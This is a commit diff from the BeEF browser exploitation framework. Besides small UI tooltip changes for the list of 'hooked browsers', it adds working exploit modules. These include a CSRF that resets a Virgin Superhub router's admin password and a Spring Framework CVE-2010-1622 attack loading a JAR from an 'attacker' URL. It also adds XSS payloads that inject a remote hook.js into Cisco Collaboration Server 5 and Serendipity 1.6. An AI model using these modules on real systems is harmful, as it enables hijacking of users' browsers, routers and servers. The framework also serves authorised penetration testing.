Merge branch 'master' of github.com:beefproject/beef

extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js

@@ -36,6 +36,7 @@ zombiesTreeList = function(id) {
 	//the tree node that contains the list of online hooked browsers
 	this.online_hooked_browsers_treenode = this.root.appendChild(
         new Ext.tree.TreeNode({
+            qtip: "Online hooked browsers",
             text:'Online Browsers',
             cls:'online-zombies-node',
             expanded:true
@@ -45,6 +46,7 @@ zombiesTreeList = function(id) {
 	//the tree node that contains the list of offline hooked browsers
 	this.offline_hooked_browsers_treenode = this.root.appendChild(
         new Ext.tree.TreeNode({
+            qtip: "Offline hooked browsers",
             text:'Offline Browsers',
             cls:'offline-zombies-node',
             expanded:false
@@ -183,7 +185,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
 	 */
     addZombie: function(hooked_browser, online, checkbox) {
 		var hb_id, mother_node, node;
-		
+
 		if(online) {
 			hb_id = 'zombie-online-' + hooked_browser.session;
 			mother_node = this.online_hooked_browsers_treenode;
@@ -193,7 +195,9 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
 		}
 		var exists = this.getNodeById(hb_id);
 		if(exists) return;
-		
+
+		hooked_browser.qtip = hooked_browser.text + ' hooked on ' + hooked_browser.domain + ":" + hooked_browser.port;
+
 		//save a new online HB
 		if(online && Ext.pluck(this.online_hooked_browsers_array, 'session').indexOf(hooked_browser.session)==-1) {
 			this.online_hooked_browsers_array.push(hooked_browser);
@@ -253,6 +257,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
 			sub_folder_node = new Ext.tree.TreeNode({
 				id: 'sub-folder-'+folder,
 				text: folder,
+				qtip: "Browsers hooked on "+folder,
 				checked: ((checkbox) ? false : null),
 				type: this.tree_configuration["sub-branch"]
 				});

modules/exploits/local_host/activex_command_execution/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         activex_command_execution:
             enable: true
-            category: "Exploits"
+            category: ["Exploits", "Local Host"]
             name: "ActiveX Command Execution"
             description: "Execute arbitrary commands using the \"WSCRIPT.Shell\" object. The command response is not returned to BeEF.<br><br>The browser must have \"Initialize and script ActiveX controls not marked as safe for scripting\" enabled."
             authors: ["bcoles"]

modules/exploits/local_host/java_payload/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         java_payload:
             enable: true
-            category: "Exploits"
+            category: ["Exploits", "Local Host"]
             name: "Java Payload"
             description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.<br /><br />Before launching it, be sure to have the JavaPayload StagerHandler listening,<br />i.e.: java javapayload.handler.stager.StagerHandler &lt;payload&gt; &lt;IP&gt; &lt;port&gt; -- JSh<br /><br />Windows Vista is not supported."
             authors: ["antisnatchor"]

modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         mozilla_nsiprocess_interface:
             enable: false
-            category: "Exploits"
+            category: ["Exploits", "Local Host"]
             name: "Mozilla nsIProcess XPCOM Interface (Windows)"
             description: "The nsIProcess XPCOM interface represents an executable process. JavaScript code with chrome privileges can use the nsIProcess interface to launch executable files. In this module, nsIProcess is combined with the Windows command prompt cmd.exe<br /><br />Any XSS injection in a chrome privileged zone (e.g. typically in Firefox extensions) allows this module to execute arbitrary commands on the victim machine."
             authors: ["wade", "bcoles", "roberto.suggi@security-assessment.com", "nick.freeman@security-assessment.com"]

modules/exploits/local_host/safari_launch_app/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         safari_launch_app:
             enable: true
-            category: "Exploits"
+            category: ["Exploits", "Local Host"]
             name: "Safari Launch App"
             description: "Launch an application from the victim machine.<br/><br/>See CVE-2011-3230 for more details.<br /><br />Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel."
             authors: ["antisnatchor"]

modules/exploits/local_host/window_mail_client_dos/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         windows_mail_client_dos:
             enable: true
-            category: "Exploits"
+            category: ["Exploits", "Local Host"]
             name: "Windows Mail Client DoS"
             description: "This module exploits an unhandled exception in Windows Mail to crash the client remotely.<br /><br />Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's also vulnerable on Windows 7 SP2).<br /><br />The protocol handler used will be: nntp."
             authors: ["bcoles"]

modules/exploits/router/virgin_superhub_csrf/command.js

@@ -0,0 +1,35 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var gateway = '<%= @base %>'; 
+	var passwd  = '<%= @password %>';
+
+	var virgin_superhub_iframe = beef.dom.createIframeXsrfForm(gateway + "/goform/RgSecurity", "POST", [
+		{'type':'hidden', 'name':'NetgearPassword', 'value':passwd} ,
+		{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
+		{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(virgin_superhub_iframe);
+	}
+	setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/router/virgin_superhub_csrf/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        virgin_superhub_csrf:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Virgin Superhub CSRF"
+            description: "Attempts to change the admin password on a Virgin Superhub router."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/exploits/router/virgin_superhub_csrf/module.rb

@@ -0,0 +1,29 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Virgin_superhub_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.254/'}, 
+			{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/spring_framework_malicious_jar/command.js

@@ -0,0 +1,32 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	jar_file        = "<%= @jar_file %>";
+	form_controller = "<%= @form_controller %>";
+
+    uri = form_controller+"?class.classLoader.URLs[0]=jar:"+jar_file;
+	var spring_iframe = beef.dom.createInvisibleIframe();
+	spring_iframe.setAttribute('src', uri);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(spring_iframe);
+	}
+	setTimeout("cleanup()", 15000);
+
+});

modules/exploits/spring_framework_malicious_jar/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        spring_framework_malicious_jar:
+            enable: true
+            category: "Exploits"
+            name: "Spring Framework Malicious Jar"
+            description: "Execute a malicious JAR file using the Spring Framework 'class.classloader' vulnerability (CVE-2010-1622).<br/>Specify the URL for a form controller on the target and the URL for your malicious JAR file.<br/>For more information see: http://www.exploit-db.com/exploits/13918/<br/><br/>Versions Affected:<br/>3.0.0 to 3.0.2<br/>2.5.0 to 2.5.6.SEC01 (community releases)<br/>2.5.0 to 2.5.7 (subscription customers)"
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/exploits/spring_framework_malicious_jar/module.rb

@@ -0,0 +1,29 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Spring_framework_malicious_jar < BeEF::Core::Command
+
+  def self.options
+    return [
+        {'name' => 'form_controller', 'ui_label' => 'Form Controller URL', 'value' => 'http://target/path/to/form/controller'},
+        {'name' => 'jar_file', 'ui_label' => 'Malicious JAR file URL', 'value' => 'http://attacker/path/to/attack.jar!/'}
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end

modules/exploits/xss/cisco_collaboration_server_5_xss/command.js

@@ -0,0 +1,26 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
+
+	var cisco_collaboration_iframe = beef.dom.createInvisibleIframe();
+	cisco_collaboration_iframe.setAttribute('src', uri);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+});
+

modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        cisco_collaboration_server_5_xss:
+            enable: true
+            category: ["Exploits", "XSS"]
+            name: "Cisco Collaboration Server 5 XSS"
+            description: "Attempts to hook Cisco Collaboration Server 5 using XSS.<br/>For more information see: http://www.exploit-db.com/exploits/11403/"
+            authors: ["bcoles", "s4squatch"]
+            target:
+                working: ["ALL"]

modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb

@@ -0,0 +1,33 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Cisco_collaboration_server_5_xss < BeEF::Core::Command
+
+	def self.options
+
+		configuration = BeEF::Core::Configuration.instance
+		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+
+		return [
+			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest="><script src="'+hook_uri+'"></script>'}
+		]
+
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/xss/serendipity_1.6_xss/command.js

@@ -0,0 +1,26 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
+
+	var serendipity_iframe = beef.dom.createInvisibleIframe();
+	serendipity_iframe.setAttribute('src', uri);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+});
+

modules/exploits/xss/serendipity_1.6_xss/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        serendipity_1_6_xss:
+            enable: true
+            category: ["Exploits", "XSS"]
+            name: "Serendipity <= 1.6 XSS"
+            description: "Attempts to hook Serendipity <= 1.6 using XSS.<br/>For more information see: http://www.exploit-db.com/exploits/18884/"
+            authors: ["bcoles", "Stefan Schurtz"]
+            target:
+                working: ["ALL"]

modules/exploits/xss/serendipity_1.6_xss/module.rb

@@ -0,0 +1,33 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Serendipity_1_6_xss < BeEF::Core::Command
+
+	def self.options
+
+		configuration = BeEF::Core::Configuration.instance
+		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+
+		return [
+			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]=\'"</script><script src="'+hook_uri+'"></script>'}
+		]
+
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end